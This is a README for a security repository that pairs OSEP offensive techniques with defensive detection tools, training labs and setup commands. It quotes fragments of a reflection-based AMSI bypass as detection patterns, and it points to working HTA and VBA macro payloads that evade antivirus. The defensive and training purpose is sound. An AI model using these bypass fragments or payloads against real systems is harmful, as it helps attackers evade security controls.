A comprehensive repository containing both offensive security techniques from OSEP (Offensive Security Experienced Penetration Tester) studies and their corresponding defensive countermeasures. This repository has been enhanced with production-ready defensive tools to help security teams detect and prevent advanced attack techniques.
This repository is designed for defensive security analysis and education only. The offensive techniques are provided for understanding attack vectors to better defend against them. All defensive tools included are for legitimate security analysis purposes.
- 🛡️ Defensive Security Tools
- 🎯 Offensive Techniques (For Analysis)
- 🚀 Quick Start
- 📖 Training Labs
- 🔧 Installation
- 📚 Documentation
- 🤝 Contributing
Our defensive toolkit transforms OSEP attack knowledge into practical security solutions:
- PowerShell module detecting reflection-based AMSI bypasses
- Real-time monitoring with Windows Event Log integration
- Detects:
[Ref].Assembly.GetTypes(),GetFields('NonPublic,Static'),SetValue($null,$true) - Risk Level: CRITICAL - Immediate action required
- Python tool with YARA rule integration for malicious HTA detection
- Detects SuperSharpShooter patterns, certutil chains, Office-spawned processes
- Machine learning behavioral analysis for zero-day HTA attacks
- Risk Level: HIGH - Active threat detection
- PowerShell framework for comprehensive AD security monitoring
- Detects: Kerberos delegation abuse, LAPS exploitation, relay attacks
- Baseline establishment and behavioral analysis for AD environments
- Risk Level: HIGH - Advanced persistent threat detection
- Python system detecting process hollowing, DLL injection, VBA injection
- Windows memory analysis integration with behavioral monitoring
- Correlates with EDR systems for enhanced detection capabilities
- Risk Level: CRITICAL - Code execution detection
- Specialized Ligolo-ng detection for OSEP tunneling techniques
- Multi-protocol analysis: DNS, HTTP, ICMP, SSH tunneling
- Real-time packet capture with machine learning feature extraction
- Risk Level: HIGH - Network evasion detection
- Comprehensive training platform with 6 lab categories
- Guided exercises, attack simulations, and hands-on practice scenarios
- Installation assistance and progress tracking for all defensive tools
- ✅ SIEM Integration: JSON, CSV, CEF format support for enterprise SIEM platforms
- ✅ Real-time Monitoring: Live threat detection with automated alerting
- ✅ Machine Learning: Behavioral analysis and anomaly detection
- ✅ Cross-Platform: Windows and Linux compatibility where applicable
- ✅ Production Ready: Enterprise deployment with comprehensive logging
- ✅ Threat Intelligence: IOC integration and threat feed compatibility
Understanding these attack vectors enables better defensive strategies:
Advanced AD attack techniques for defensive analysis:
- Delegation: Unconstrained, Constrained, Resource-Based Constrained Delegation
- LAPS: Local Administrator Password Solution exploitation techniques
- Relay: NTLM and Kerberos relay attack patterns
Anti-Malware Scan Interface bypass techniques:
- Reflection-based bypasses detected by our defensive engine
- PowerShell logging evasion methods
AV evasion techniques for defensive understanding:
- Payload encoding and obfuscation methods
- EDR bypass strategies
Constrained Language Mode bypass techniques:
- Sliver and Meterpreter built-in bypasses
- Alternative methods when Windows Defender is active
Social engineering attack vectors:
- HTA: HTML Application attack methods (2 working examples)
- Word: VBA macro attacks (3 x 32-bit, 1 x 64-bit bypassing current AV)
Network evasion and pivoting techniques:
- Ligolo-ng: Advanced tunneling solution (recommended over proxychains)
- Detection Patterns: Our Network Tunnel Detector specifically targets these techniques
- CSharp Everything: C# offensive tooling collection
- EveryBox: Standard enumeration tools for any target
- MSSQL: Database-specific attack techniques
# 1. Clone the repository
git clone https://github.com/your-repo/OSEP-Everything.git
cd OSEP-Everything
# 2. Launch the defensive lab menu
cd DefensiveTools/Lab-Menu
python3 defensive_lab_menu.py
# 3. Start with AMSI detection (requires PowerShell)
cd ../Defend-AMSI
Import-Module .\Defend-AMSI.psm1
Initialize-AMSIDefense
# 4. Begin network monitoring (requires root/admin)
cd ../Network-Tunnel-Detector
sudo python3 tunnel_detector.py --monitor 30 --verbose# Analyze attack techniques for defensive purposes
cd Active Directory/Delegation
# Review constrained delegation patterns for detection
cd AMSI
# Study bypass techniques to improve defensive rules
cd Phishing/HTA
# Analyze HTA attack vectors for defensive signaturesOur interactive lab system provides hands-on experience:
-
🛡️ AMSI Bypass Detection Labs (5 labs)
- PowerShell reflection detection
- Event log analysis
- Real-time monitoring setup
-
📄 HTA Attack Analysis Labs (4 labs)
- YARA rule development
- Behavioral analysis training
- Malicious HTA identification
-
🏛️ Active Directory Security Labs (6 labs)
- Kerberos attack detection
- LAPS security monitoring
- Delegation abuse identification
-
💉 Process Injection Detection Labs (5 labs)
- Memory analysis techniques
- VBA injection detection
- Process hollowing identification
-
🌐 Network Tunnel Detection Labs (4 labs)
- Ligolo-ng pattern recognition
- DNS tunneling analysis
- Traffic baseline establishment
-
🔬 Advanced Integration Labs (3 labs)
- Multi-tool correlation
- SIEM integration
- Automated response workflows
cd DefensiveTools/Lab-Menu
python3 defensive_lab_menu.py
# Navigate through interactive menus:
# 1-6: Select lab category
# 7: View progress and results
# 8: Installation assistance
# 9: Documentation and help- Windows 10/11 or Linux (Ubuntu 20.04+)
- PowerShell 5.1+ (for AMSI and AD tools)
- Python 3.7+ (for analysis tools)
- Administrator/Root privileges (for monitoring tools)
# Run the lab menu for guided installation
cd DefensiveTools/Lab-Menu
python3 defensive_lab_menu.py
# Select option 8: Tool Installation & Setup# Install Python dependencies
pip install -r DefensiveTools/requirements.txt
# Install PowerShell modules (Windows)
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
Import-Module .\DefensiveTools\Defend-AMSI\Defend-AMSI.psm1
# Install system dependencies (Linux)
sudo apt-get update
sudo apt-get install libpcap-dev python3-dev
# Verify installation
python3 -c "import scapy, psutil, dns.resolver; print('Dependencies OK')"- AMSI Detection Engine Guide
- HTA Analyzer Manual
- AD Security Framework Docs
- Process Injection Detector Guide
- Network Tunnel Analyzer Manual
We welcome contributions that enhance defensive capabilities:
- 🛡️ New Detection Rules: Additional attack pattern signatures
- 📊 Analytics Improvements: Enhanced behavioral analysis
- 🔧 Tool Enhancements: Performance and accuracy improvements
- 📚 Documentation: Usage guides and implementation examples
- 🧪 Testing: Additional test cases and validation scenarios
- Fork the repository
- Create a feature branch:
git checkout -b defensive-enhancement - Test thoroughly with provided test suites
- Document new features and detection capabilities
- Submit a pull request with detailed description
- All defensive tools must include comprehensive test suites
- Documentation must include real-world deployment examples
- Detection rules must minimize false positives
- Performance impact must be documented and optimized
For security vulnerabilities in defensive tools: Create a private issue
- 📖 Check documentation and README files first
- 🧪 Run test suites to validate setup
- 💬 Open an issue for bugs or feature requests
- 📧 Contact maintainers for enterprise deployment guidance
This repository is provided for legitimate security analysis and education purposes only. Users are responsible for compliance with applicable laws and regulations. The defensive tools included are designed to protect against the attack techniques demonstrated.
Educational Use Only - Not for unauthorized testing or malicious purposes.
Community resources for continued learning:
🛡️ Defend Forward - Understand Attacks to Build Better Defenses 🛡️